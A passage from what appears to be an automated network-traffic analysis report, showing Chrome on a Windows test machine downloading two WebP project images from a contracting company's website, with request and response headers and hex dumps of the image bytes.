                                              2024-09-27 06:20:14 UTC8000INData Raw: 14 46 ed 18 50 d1 bc 20 5c 8b ef 32 81 40 8f 62 68 bd 14 24 32 f1 a0 8b bb 5a c8 d1 cf 70 4d c5 2a 35 01 9e 52 bf 22 c6 39 6d 4e 96 87 55 ce 7c bf 5d 2e c8 9f 57 6f ad 72 a2 a2 af 1b 8a c2 32 83 11 7a 82 dc 55 66 da 3b 4f 93 05 92 c8 50 c8 0b 84 ff c8 e4 54 cc 59 f9 48 38 61 b1 51 d7 d9 b6 a0 f4 33 15 ff 2f 74 0c 92 d4 38 8f 55 88 b6 0b c5 54 a2 7c 25 e1 d3 83 f3 31 ff cd a4 4b 94 b5 0a c6 16 37 55 1a f3 a0 24 36 fd b5 f4 c5 96 42 e4 ec af e0 bc aa f5 58 7f a7 32 2c b2 b0 3e 00 8a b9 24 be 85 94 13 a2 27 4a c8 4f c8 82 bc dc 48 4a 85 bd e2 16 7c 9f bb 20 7f af 24 13 3c ab 26 27 d8 1a 52 6e a5 cc 05 f4 5b 12 0a d9 c2 11 d8 08 38 6b 0c cf a1 0e 56 5e 4d 44 e7 76 8a 67 cc 88 d7 fb 5f 12 f2 be 3e 50 b9 80 e6 8e 1c f6 57 36 78 80 51 cf f8 ca 56 d6 3a 40 08 77
                                              Data Ascii: FP \2@bh$2ZpM*5R"9mNU|].Wor2zUf;OPTYH8aQ3/t8UT|%1K7U$6BX2,>$'JOHJ| $<&'Rn[8kV^MDvg_>PW6xQV:@w
                                              2024-09-27 06:20:14 UTC8000INData Raw: 44 f3 fb 3f d2 39 0f f2 3b a8 0d 28 0b 99 c8 82 60 91 41 38 74 83 13 34 c8 f6 6e c2 ad 58 a3 de c7 59 ef 99 e4 ea 03 7f 51 cd 50 52 ec 41 c2 42 c3 99 56 bf c6 34 ad e5 c4 3f 18 ac 32 ef 17 de 48 2e 31 60 bc 81 b6 d5 5a 7c f0 20 8e f7 b3 1c e3 92 48 c3 1a 38 dd 32 95 de f4 00 01 86 b1 c6 1a c7 cd 79 9f 8f a6 1f 58 68 06 1e 31 c0 1b 56 4d 4c 02 50 82 f5 10 56 22 bb c7 63 58 0f ae b2 b7 5a 5e ec b1 31 c9 1b a4 bb ee f1 a5 10 71 93 d0 02 39 c0 0b 04 8f 32 5d fb d6 8a dd b3 a9 c3 9e eb e3 96 2f 18 d5 9f d6 f8 21 b2 7c e6 cb 11 3e 83 c5 d5 1a 4e 6e c2 7a aa 04 35 bb 50 cc 36 e3 e1 af 1d fb e7 04 0a c1 58 02 f1 54 c6 e2 7a b0 8b 4f c9 d7 bc c0 2e b3 40 e3 17 13 88 7c 92 88 8e 85 dc ed cd 03 ad 6f 74 bb cb 34 34 40 15 43 f8 0e 22 e8 5c 2b e6 95 4d 9a 5a d5 b3 df
                                              Data Ascii: D?9;(`A8t4nXYQPRABV4?2H.1`Z| H82yXh1VMLPV"cXZ^1q92]/!|>Nnz5P6XTzO.@|ot44@C"\+MZ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              77192.168.2.465414173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC723OUTGET /uploads/projects/7/21d631acc2ddb0fc3dcf4f737c53f9da.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:14 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 14:14:19 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 60650
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:14 UTC7931INData Raw: 52 49 46 46 e2 ec 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 6e ec 00 00 30 32 06 9d 01 2a cf 04 a3 03 3e e9 6a ae 52 a9 25 b3 33 a4 92 ab 82 70 1d 09 65 6e 0a c3 b9 61 f0 ba af 26 6e 75 3b f1 2a fd 59 e7 cc 2a 68 d5 5f 83 57 ea 1e a9 26 e7 62 be f7 c4 b3 d2 3f d2 f4 da e4 43 f0 7f f5 bd 83 ff 66 bd 54 73 b3 fe cb 9f 2f a4 1c fb bc db 87 9a 79 df 8f 22 e2 03 b6 ff 51 ec da fc 4b 34 7f 8c ef bd ff 8f d6 a7 f8 2f 51 1f f0 dd 1e 3f b6 7f e0 f5 5b fd 4b fe 3f ad 1f a5 af f6 de 9d 9e 97 bf fc 7f ff ff ff f8 64 fe bd ff a3 ff ff b9 1f 9d 6f ff 5f 69 4f f3 7e ab ff e4 7d 00 3f ff fb 71 74 23 f9 c7 fe ef 3b df 48 ff 4f ff af fc af 2f ff 45 fd 67 fe 5f ed fd d8 ff d2 d0 df dd ff e3 e3 fb fb 36 73 3f e6 fd d6 f3 87 f6 3f 06
                                              Data Ascii: RIFFWEBPVP8XVP8 n02*>jR%3pena&nu;*Y*h_W&b?CfTs/y"QK4/Q?[K?do_iO~}?qt#;HO/Eg_6s??
                                              2024-09-27 06:20:14 UTC8000INData Raw: c1 71 bb 97 0c 68 3b ca 40 b8 9e 43 ae c1 52 e4 60 47 ef 58 46 0e 7d bb 1a 90 36 c1 a5 c5 91 d5 77 a8 f0 48 49 d1 b1 71 22 21 70 e0 25 5f d7 0a f9 e4 66 a6 91 11 e2 da 65 23 4c d4 83 e6 f5 84 3f b0 1c 4e 74 3e dd e4 16 40 e4 38 ee 18 76 1d dc 8e 8b 81 50 52 ac 8d 26 6f 27 cf 1c 2c b8 09 e3 88 5d 97 c4 71 32 cc a4 b0 49 b4 9b 82 88 b0 bb 6b 1c 0d 76 9a b0 e6 84 a1 bf 7d e9 f4 4a 16 8b 89 71 f8 f9 fd 3a 83 9f 18 9a 9e 2a 78 88 c8 9d b2 5a a8 86 b4 76 24 a2 ac 26 cb 35 5e c2 43 13 2e 5e 58 3f d8 2c 69 5b 92 85 18 ce 18 24 d7 bd 09 36 ae ee 91 66 8e 0d 31 7d fc ed c0 33 30 84 37 a7 09 13 f5 c0 c3 8a 5a 07 87 04 b2 f6 9c a1 09 bd 71 a1 45 61 eb 6d eb 31 3d 49 e3 33 50 ac 24 0a 08 95 1f f3 3c e7 d1 65 f8 55 02 e7 03 9f 26 7e f1 0f 46 04 4f 8a d6 85 17 0d 34 78
                                              Data Ascii: qh;@CR`GXF}6wHIq"!p%_fe#L?Nt>@8vPR&o',]q2Ikv}Jq:*xZv$&5^C.^X?,i[$6f1}307ZqEam1=I3P$<eU&~FO4x
                                              2024-09-27 06:20:14 UTC8000INData Raw: 04 36 da 10 e3 f7 08 d3 4f 49 e1 57 e4 3c 84 36 e2 50 70 4a 55 3f 65 7b 6c 75 3a 51 93 24 77 30 88 ac c7 83 aa 0c e0 e0 46 4b cf ef 0c 89 a5 01 26 6d c2 43 69 1d 31 1c ff 3a f1 4a f9 83 9d da 93 64 16 bd 79 8f 6e fd 24 36 60 5e b5 39 c9 80 5b 50 f7 93 ae c8 84 d3 f9 93 27 1b 25 01 ce 3c 09 50 68 f9 dc d2 21 c0 c4 90 de 18 36 a4 db 8c e6 76 ee 45 26 e7 88 10 d2 b4 48 e8 5e 01 10 cd 93 5d 17 f3 d8 b1 71 8a 6c 5b 17 bc 1b 46 cf c0 91 16 1b 5d d2 89 68 8f 54 3e e0 30 50 de e9 88 5f dc 0d bb 90 81 7f 53 27 d1 bb c0 1c 9f 71 2b 6f d1 54 9a 60 91 e1 c3 64 6b 2e c5 d3 f5 0d a1 e0 d7 1d a9 13 95 69 00 01 39 1b 26 1e 62 12 e6 a6 3a b6 46 05 a2 0a 99 2e bb 0b 8d dd be d3 6f ac 05 49 03 ac d6 06 94 f1 42 44 8f 2d 0e 28 92 16 b5 fc d6 89 0d 12 fb 09 3a d7 bf 34 90 7a
                                              Data Ascii: 6OIW<6PpJU?e{lu:Q$w0FK&mCi1:Jdyn$6`^9[P'%<Ph!6vE&H^]ql[F]hT>0P_S'q+oT`dk.i9&b:F.oIBD-(:4z
                                              2024-09-27 06:20:14 UTC8000INData Raw: c8 de 15 50 53 78 16 6a 11 66 71 52 e6 9e 02 b3 e5 f0 53 2e 3c c6 2e c7 2a f1 36 17 6c 1a 85 f5 b2 d2 c3 d4 87 9c 21 74 81 ac f5 7d 7d bd 50 59 a2 7e 4c a0 70 50 8a 8a 6d 0c f9 f6 22 4f e3 86 b2 78 6b 55 15 0c 02 e7 24 8a 3d 71 82 22 67 59 3b e8 3b b6 4a 4a b1 ff fc 83 1c 15 b0 4c c2 8c 68 6f 97 c2 22 3b c3 1d dc f2 97 60 32 64 63 16 20 4a ad 85 59 af 28 4e 5d 1b 19 4a 5a f3 14 ca 0b 4f 9b 5b 0d c7 38 4c e4 9c 06 1b 6d d3 d0 28 b1 5d 7d 8f f6 22 bf 8b fe bc 05 10 0c 53 b0 6d aa 04 27 0a 36 4b 03 16 4b 6d 55 43 5c 30 a2 a3 e3 fc 26 28 97 49 82 20 18 9b b5 b5 f0 78 9e 76 88 dd 87 82 59 e5 a3 df b3 16 6f fc a7 fa 3a 3d 9d 86 85 15 9e 26 5e a8 41 20 62 35 71 a5 8f 2a 56 32 ca 14 ef ca ca b1 0f c0 66 d1 08 41 d4 6e 6d 05 b2 5b 61 c2 6b d4 9b 66 3a 4b d8 3f 16
                                              Data Ascii: PSxjfqRS.<.*6l!t}}PY~LpPm"OxkU$=q"gY;;JJLho";`2dc JY(N]JZO[8Lm(]}"Sm'6KKmUC\0&(I xvYo:=&^A b5q*V2fAnm[akf:K?
                                              2024-09-27 06:20:14 UTC8000INData Raw: 4c 80 42 4f a0 82 10 6d cd 6e d2 1b ee b8 80 bd 67 e4 6a 41 d4 64 80 1a 16 7e de e1 6b e8 cb b3 b7 af 42 03 11 c3 38 6a 71 8d 70 a4 19 c1 95 62 13 0a a7 21 cf 4d 50 31 96 0f d9 19 0a c5 2a 8d 62 a7 fb 54 0c 0f 82 93 33 91 4e 85 37 eb 49 36 42 bf 10 76 9f b3 d7 e6 01 16 ea be 89 12 a0 e0 8d d6 71 e0 d0 dc 3d 3e 99 d5 b7 25 7d 4d 5e 04 ad 07 e1 57 5d 36 74 06 ae e8 3a 0c b3 05 16 bb ee 3a 69 93 8a b5 0d b9 c5 ac a2 8d 73 8a 36 2b 8c d7 2a 4c 5a 34 57 ff 04 73 bf 01 b8 ea 11 71 bf f0 aa 7d d7 09 a1 cb 05 af 60 52 71 99 22 d3 ef ff 28 8c dc e7 67 11 f1 c5 af e6 50 c3 25 06 81 14 18 f7 33 0c 13 a6 4e 0d 24 24 7c 5e b0 f0 26 67 2d c8 07 c9 76 be 0b 57 5f d9 ec 70 58 14 50 17 8a eb 69 75 78 b7 c4 d7 6e 38 f3 b2 80 b0 51 78 b5 5a a4 4d 59 87 8f d9 e4 2c f2 ff bb
                                              Data Ascii: LBOmngjAd~kB8jqpb!MP1*bT3N7I6Bvq=>%}M^W]6t::is6+*LZ4Wsq}`Rq"(gP%3N$$|^&g-vW_pXPiuxn8QxZMY,
                                              2024-09-27 06:20:14 UTC8000INData Raw: 5d e5 c4 43 ee 67 50 2b 48 9d f9 1c 51 77 9e 56 e3 00 a8 0a ca 62 e5 90 ed 68 bd 91 51 76 9e 6a 4f 7f bf 1c 9d f1 cb eb 0f 5e 68 db de 28 74 60 c7 24 a0 e3 ce 82 82 68 9d 5e 86 43 45 67 6d da 3d d3 08 83 d8 87 ea a1 0d c5 7f 7e fc 38 36 a7 0f b0 81 62 d9 1b 30 36 de b7 04 93 89 97 ca b3 4c 7c 66 8e 29 8b 01 be 75 7f 7d f7 67 c0 2f 10 29 77 4e e5 b4 82 62 ba 1c 2d a2 8d df 5b 1c dc 96 e7 99 cb ee 1e 8f fe 89 4c 56 3b e6 8f 65 8e 74 07 a1 67 bc 46 a1 91 ce af 0e cc d3 40 56 1f 19 1f 53 2a e5 91 16 94 6f 62 c2 8a b6 57 4c 5f 28 25 24 37 1f 00 66 6f fb f9 60 06 b1 fa f8 37 e2 88 87 ad eb 05 12 75 f7 85 67 c2 48 e5 e6 69 f8 2a 36 77 0b 11 66 8a fc 1d e6 34 5c 5b 1c 3e 8c 8a b1 e1 16 f2 39 0f 58 e1 aa a8 6d ab 22 0e d0 d9 c6 c0 cc cc 02 36 1b d4 e4 2c 89 e5 a9
                                              Data Ascii: ]CgP+HQwVbhQvjO^h(t`$h^CEgm=~86b06L|f)u}g/)wNb-[LV;etgF@VS*obWL_(%$7fo`7ugHi*6wf4\[>9Xm"6,
                                              2024-09-27 06:20:14 UTC8000INData Raw: bf 48 14 06 cf 56 f1 d9 13 d4 a6 53 c1 fe a7 c4 fa 34 f3 fd 20 32 de 43 57 43 b2 13 f9 55 1c 4f e9 0e 3a 16 5a ce 1d e7 a7 f7 5c ab 0d 85 66 04 b0 d7 f6 fd 14 b1 79 b8 ee 4c 7d d3 2c 3d 59 4a d1 43 b4 42 b6 a2 37 bc 21 69 8b 11 ed 25 b0 b1 46 4f af af a1 61 39 b1 cc 0d 09 b6 a6 31 f1 17 c1 65 9a 59 12 98 88 88 9d ec a1 8a 2c 89 e6 7a 0a 72 63 f2 6a 00 70 d3 b7 38 6e 55 44 fd da a6 10 8a c8 f6 b4 8e 6f d7 29 d5 7c a2 7a 89 58 1d 55 01 a0 ac ca 5f f3 9b 4d cc 27 0f 43 5e af 79 5a 68 24 e1 c3 17 bc 9b 73 d9 3b e9 7b 6a 16 27 db fe aa bd d4 e8 a5 3b fe 03 d3 95 80 69 5f 26 b2 ba 54 48 08 5b 74 da da ce 0c c6 6c a6 52 ed 13 98 f2 40 ce 51 84 c5 89 38 30 12 fb c1 a0 97 21 93 f6 e3 71 85 bf 20 c7 a9 c1 17 cd 11 c2 7a 51 dd 15 12 57 5c 56 4f 72 33 27 b2 02 e9 a3
                                              Data Ascii: HVS4 2CWCUO:Z\fyL},=YJCB7!i%FOa91eY,zrcjp8nUDo)|zXU_M'C^yZh$s;{j';i_&TH[tlR@Q80!q zQW\VOr3'
                                              2024-09-27 06:20:14 UTC4719INData Raw: f9 8f ad b8 67 04 00 3a b8 7b 4f 28 22 b9 1b 72 ba 3e 86 78 07 f1 5e bc bb f1 f8 c1 da a3 cd 23 ce 1d 89 d4 54 3a 5c ee 49 af 62 22 b8 62 9d b0 ed a6 00 a0 83 6d 12 fc c0 3d dc a0 36 1c 82 3d 8e f2 f0 f3 49 7e c7 b6 ed 59 28 91 4a d6 e0 d8 d4 0e f8 ae 94 92 02 01 59 9e 50 7e 05 c3 37 a7 fd 2f 8b e5 36 4b e8 49 39 b6 f7 51 f5 8c 8f 4b 1a a9 ab 7a 07 30 a7 99 8a 51 e1 f6 5d 35 cb cf b5 b7 20 2f ae 6b 45 cd bf 75 22 fd 72 d2 bc ed c0 bb 39 ba 14 79 c4 0f a4 6c 6d 8c a6 4d 2c fa dd 21 d1 88 2f 41 c4 f5 10 5f 88 2f dc 3a 2c 8b 22 b1 37 d3 29 7c 8f e1 1c fe 3c 97 ad 12 1f 27 43 43 74 f8 d8 13 35 c1 49 83 24 61 15 c5 f7 5a 14 15 16 ff 1b 59 03 b5 8e 2f 2a f3 d7 fe 6c 71 0e 2b 0b 9e 89 bc 02 e1 ab a9 71 03 49 ff aa a1 6f b6 a9 a0 cd 8f 03 0a 40 a1 f9 cc f4 4c 93
                                              Data Ascii: g:{O("r>x^#T:\Ib"bm=6=I~Y(JYP~7/6KI9QKz0Q]5 /kEu"r9ylmM,!/A_/:,"7)|<'CCt5I$aZY/*lq+qIo@L


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              78192.168.2.465413173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC723OUTGET /uploads/projects/8/0c298f1956a31b39bf820e0dd7ec632b.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:14 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 14:18:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 70462
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:14 UTC7931INData Raw: 52 49 46 46 36 13 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 c2 12 01 00 b0 96 05 9d 01 2a cf 04 a3 03 3e e9 6e ae 52 29 26 29 af a6 b7 0a 39 f0 1d 09 63 4b 96 72 eb ea d4 f2 93 6a 62 fc 5b 78 e8 71 06 6b d0 7b e6 ff 09 d6 29 e8 7c 27 c8 ff 93 ff 15 9f 1f 6d b5 f0 fd a7 af bf fa bc 89 f8 df fd 5f bf fe c9 be fb fe df ef cf 69 3e a1 7f aa 7f f8 f4 ff f5 41 ea 8b 9e cf cd 7b ff ff 57 d7 af 06 f5 d7 f6 3c 91 1f a3 79 43 fa 4f f5 fe 08 fe 8d ee f7 ba 15 fa fe 9b c1 3f 8e 5e bb ff d6 f0 07 e7 17 d4 de c1 7f 9b f9 05 f2 ff c1 f7 7e ff ad e8 29 ee 47 e1 7f fd 7a ee fe e7 9d 5f db ff bc f6 03 ff 15 fe db d7 5f 06 4a 03 7f 56 ff 77 eb 29 ff 6f ff ff fd 3e ad ff 6a ff bb ec 37 fd 73 fd 87 ff ef f6 dd ba ca 4c 19 b7 99 ae ff
                                              Data Ascii: RIFF6WEBPVP8XVP8 *>nR)&)9cKrjb[xqk{)|'m_i>A{W<yCO?^~)Gz__JVw)o>j7sL
                                              2024-09-27 06:20:14 UTC8000INData Raw: f3 d3 7c 8f 9c 6d b0 48 69 66 c0 12 f5 20 59 df 1d 04 07 cc 42 f5 76 53 0d ce d1 1a e1 66 cc 79 00 75 bb c6 2c b5 93 0f b6 89 16 11 98 bd e4 a7 53 1c 67 5b 1e 50 6c 87 c6 37 12 5f 07 37 ef 63 48 a3 e5 ba c0 1d b2 0c f6 e6 0f a3 69 a9 4b 0f 0b 40 cd 32 6c eb 3d 4b a2 55 2f aa 7c e8 11 f5 2b 51 65 e7 2c 92 73 d1 ca 3d b2 4f 79 e4 d6 fe 32 40 79 ec 44 a1 2a 0b cf 24 c9 f0 b0 78 b0 b6 dc af 01 13 39 12 91 e1 22 ef 67 43 21 d3 65 c4 9f 56 ff 7e aa 76 71 76 64 3e 79 f6 fb ef 5f 4f 69 75 37 56 9f ae 01 92 fc be b4 a5 76 27 35 07 af 01 4b 95 39 12 3a be 81 07 0d 24 94 55 6f 1c fa dc 19 69 b6 8f e0 52 65 10 fa c1 2b fa 59 c1 c9 39 a6 17 d6 8f 47 c5 d3 c6 46 e9 c9 51 b4 66 e6 7a 77 2c b8 38 f6 63 7e 87 9b b5 11 5b bd 6d 4a 7a 8b f4 b4 84 74 79 bd 87 57 9f a5 bf aa
                                              Data Ascii: |mHif YBvSfyu,Sg[Pl7_7cHiK@2l=KU/|+Qe,s=Oy2@yD*$x9"gC!eV~vqvd>y_Oiu7Vv'5K9:$UoiRe+Y9GFQfzw,8c~[mJztyW
                                              2024-09-27 06:20:14 UTC8000INData Raw: 70 ce 53 88 99 9b 46 3a cb 27 64 f8 8f 14 71 94 cb bd 68 ed d0 32 b2 56 da 1f 42 32 7e bd 4d a1 36 41 fa 64 42 50 9e b3 6a e3 3a 2b 52 97 0a 67 53 be 81 c5 ec 98 80 7d ff 97 0d 02 b7 a8 c6 49 38 58 f8 3d 97 f4 50 7f 1b 37 76 4a 9b 4e be 76 72 93 c8 df 9c e1 c4 75 83 f0 7c 8e 2b 89 5d e9 9c 35 ee 6d 8e e5 0c 3a 19 a7 75 1f 1b c0 6e 66 c2 81 01 68 34 e5 20 77 ff 93 93 5c 91 9c 75 7b c4 4b 19 e2 45 22 ec 4d d3 66 d8 4c 83 ea 75 84 ca 4a f0 49 9a f5 7d 8f 29 cc 0f 55 33 84 80 41 22 3d 8b a3 1b 4a 0d 17 61 8d b7 b8 57 be 29 70 fd 08 d6 47 a1 ae 37 80 9c 3d 40 13 24 f6 7c e8 88 f0 38 09 d8 cf 19 c2 80 cd e0 a9 41 1e 01 93 35 b2 f5 95 06 aa 26 7c 86 1d da 53 a5 b6 29 1b 73 17 b3 81 1c cd 7b ba 9c 9a 72 06 b3 75 05 0a 46 6b ea 78 52 e3 d2 e9 16 3d ad 51 94 2b 0e
                                              Data Ascii: pSF:'dqh2VB2~M6AdBPj:+RgS}I8X=P7vJNvru|+]5m:unfh4 w\u{KE"MfLuJI})U3A"=JaW)pG7=@$|8A5&|S)s{ruFkxR=Q+
                                              2024-09-27 06:20:14 UTC8000INData Raw: 83 e6 62 48 f6 4d 21 c1 1e 5c 99 17 79 bd 80 66 9b b9 93 be 07 0d 20 72 d4 ea 93 b8 b2 e9 66 6e 0b 2b 19 80 ed 04 60 ce 9d 0d c9 84 b3 a9 b1 1a e4 b1 43 74 3c 1e 8f d2 18 08 82 42 f0 25 f4 16 fd fe 6e 91 64 66 a3 98 92 40 c3 3a bd 85 a6 70 26 72 9c a1 80 11 b8 2d 60 84 03 62 92 f5 90 31 b9 b2 0f 56 4f 3b 3c 92 1c 13 33 85 61 8a f1 cf 65 fb 81 ad 5c 36 6c 2b 09 c6 d1 e0 44 00 8d 78 6f 56 df 68 95 2d 3b 45 dd 8d f6 52 43 74 1e ae ab a9 2e ad 7b e9 07 46 d3 6f 56 5c a2 2d 77 a6 c0 07 ad cc ee 25 9d f5 89 33 c4 92 eb 62 76 8b 39 e3 d2 f4 1b e2 f8 9a 01 f9 66 24 52 22 78 e2 87 3b cb 96 5d 20 60 76 27 26 84 69 3b 05 fa f6 66 ae 9d 31 bc 00 1f a4 a3 d3 d3 1c 55 0e af e5 94 ab ed e7 21 bf 69 63 59 83 e3 c9 93 6d f2 cd 20 41 76 75 26 f0 d1 75 54 0c c2 e3 80 bd d2
                                              Data Ascii: bHM!\yf rfn+`Ct<B%ndf@:p&r-`b1VO;<3ae\6l+DxoVh-;ERCt.{FoV\-w%3bv9f$R"x;] `v'&i;f1U!icYm Avu&uT
                                              2024-09-27 06:20:14 UTC8000INData Raw: 64 ba e2 63 28 47 5f c0 d6 6d d4 b8 5c 43 15 23 d9 b3 c9 08 d4 dd 52 d1 b3 87 b0 ba c6 54 f8 35 1e 83 c9 64 e9 d1 71 6d 93 df 2d 2a e7 2c 21 70 d9 e2 aa 31 c7 35 e6 28 85 d6 06 07 94 9b 7e f0 b0 11 ac e4 50 c5 d0 0d 8a a9 0f fc a5 7d 42 d0 b5 ba 1c 7a 42 e0 90 37 a3 13 b2 58 c9 58 7c d1 0b a0 5c 37 2e a6 28 e3 97 01 78 d8 cc b1 be 83 76 15 41 6d 31 2b cb aa e6 de f6 b9 99 5a 06 42 31 4c f8 ed 7f 62 79 7f 9e 61 f7 be 1d 35 96 b9 70 f9 86 20 d1 a1 49 36 8f 15 a7 07 7b 3e f3 19 d9 59 56 5c f7 b8 cd 50 ab 74 2a b0 3a 1a d7 f2 c6 33 28 18 7d 75 ae 1d 27 61 e8 57 85 5e c9 a7 08 60 f1 28 84 91 48 33 47 48 0a f6 85 0b bc 09 49 34 44 6d 05 26 d8 bb b1 4b 37 b0 1f fe c2 7c cc 11 d1 6a 1a 5c 62 39 36 d3 92 3b 03 a2 4b 56 1f 21 92 b9 56 a8 a9 8f 6c 20 01 78 bb f5 bb
                                              Data Ascii: dc(G_m\C#RT5dqm-*,!p15(~P}BzB7XX|\7.(xvAm1+ZB1Lbya5p I6{>YV\Pt*:3(}u'aW^`(H3GHI4Dm&K7|j\b96;KV!Vl x
                                              2024-09-27 06:20:14 UTC8000INData Raw: b8 44 63 72 3f f0 46 eb 94 dc 7c 6f 6a 8a 5f 4d 77 25 71 99 f6 11 37 2e 63 e5 b1 e3 fd 79 f3 a8 f0 a4 39 5a 04 fd 2c 1c 63 50 c7 4d aa bf 63 22 bf bd cb 90 11 c3 92 9c 7a ee bf aa 8c bd 2d 4b 99 47 9a 06 89 c6 29 80 25 82 7a 5e c0 01 a3 a6 67 1f 46 ae ec 6d ef 9f 88 c1 3d 66 a0 78 33 da 7f 17 80 b5 da 82 8f d4 fc 7e 05 3b 8d bc d9 bc f3 7d aa ad be 44 41 b8 d5 06 08 d7 48 7c 65 05 0a 38 3e 58 76 d9 6c 06 8b 19 28 59 8a dc e9 38 72 f3 2b 8b f8 c2 37 9b 26 ce db 04 a1 e7 66 61 9d a9 21 ba c0 cc 02 44 ec 37 5b d7 6b 7d 9c 93 59 84 75 13 48 20 2f f4 d7 3d c5 03 e6 ac d2 04 6b ba 46 b1 04 c1 55 4d 07 44 2c 9b 82 32 de 37 26 17 32 ef 64 07 f5 3e ce b6 25 20 58 41 e9 53 90 cf 73 2b eb c3 9c ab 31 68 50 28 c8 61 0d 5e 57 1a a5 a3 aa 26 91 57 2e 91 86 13 2c 3b cb
                                              Data Ascii: Dcr?F|oj_Mw%q7.cy9Z,cPMc"z-KG)%z^gFm=fx3~;}DAH|e8>Xvl(Y8r+7&fa!D7[k}YuH /=kFUMD,27&2d>% XASs+1hP(a^W&W.,;
                                              2024-09-27 06:20:14 UTC8000INData Raw: f2 c1 13 00 6b a4 60 92 24 c3 90 a9 a3 c7 34 bf e0 b9 0b 8b 0f d4 3b 53 91 98 3b ed 0e 53 15 01 88 dc 69 01 41 aa 43 c2 c9 bb 6c f8 3a b0 85 7b df 8a 93 c0 0f 92 14 fe e4 d6 64 05 e2 bc 0c db cb d6 f1 a0 b7 fc b9 05 5c 7b 2d 38 c1 6a d9 5a 41 9a 7a d4 87 80 c1 31 04 02 04 67 11 97 09 81 7a e6 b9 8a 0a 83 44 23 bb 99 78 2e ff 6d 9b 7d 4a 8d f7 0a a1 4d 24 7d e6 06 42 e2 e1 fa 43 88 7d 00 53 98 7f c6 50 33 e0 8a 72 65 c3 f5 04 73 3c 3a e4 1b 0a 88 5d 26 bf 70 a9 11 b9 12 89 3a 69 4e 96 e7 52 c4 31 0c 25 72 e3 95 47 fa ac 16 7d 63 74 dc 8d 67 0e 7c 35 ad e5 e8 d2 b8 52 c1 c5 4e 8a a0 3b e5 74 15 52 ab 21 c2 dd 3c 53 52 19 b5 2f 1c db 77 00 e4 20 a3 c7 1c f5 37 90 96 91 5e 1c 8f 06 2d 68 b3 e9 df 3b a6 f4 fa a3 54 03 26 39 08 95 84 b5 cd 7b e2 f7 88 b3 90 09
                                              Data Ascii: k`$4;S;SiACl:{d\{-8jZAz1gzD#x.m}JM$}BC}SP3res<:]&p:iNR1%rG}ctg|5RN;tR!<SR/w 7^-h;T&9{
                                              2024-09-27 06:20:14 UTC8000INData Raw: fe d9 c4 a0 d6 c9 ae 8a 70 21 1a c3 b7 98 54 8b 22 ab 3f e2 3b 84 93 1c a0 3f 04 77 16 79 0b 29 4d b9 1e 66 39 4b fd 92 6e de 74 db 5f fb 08 4f 79 11 7e 23 7d b3 95 5a 20 a0 3f da a4 25 71 bf 6d 8c 77 ed 8e cb 3d 2b 02 b5 cb 3c a3 ef 6b 64 79 42 54 fe 68 2f 7b 25 d3 9f 9b 52 d6 a2 6c b4 99 89 36 35 ad 34 8e 45 ea e6 46 99 7a 2d 56 0c cc 5f 0f db a5 57 2b 04 95 43 bc 46 f2 8b 56 f3 e6 39 fa 8e 0c 5d a7 dd 2f b7 d3 ea 8f 46 42 6a 32 43 90 bf c1 2b 2d 28 57 49 5e cb 75 29 7f b2 ba 1d 5f e0 33 b0 7a 28 c9 17 70 c1 b2 69 e1 ac b8 a1 4c 89 99 52 98 a1 47 96 32 f3 b0 63 a9 be 62 72 26 44 b7 bf 72 ed b4 79 bc d3 60 f2 ac 09 1b 8e b9 c6 2f 01 6f 46 22 bf 24 3d 47 43 80 18 17 5c 27 32 81 d1 e9 4d 61 cb f6 d0 3f 27 f3 68 11 c5 c3 38 7c e0 ef 35 15 a7 b6 b9 0d 3f 48
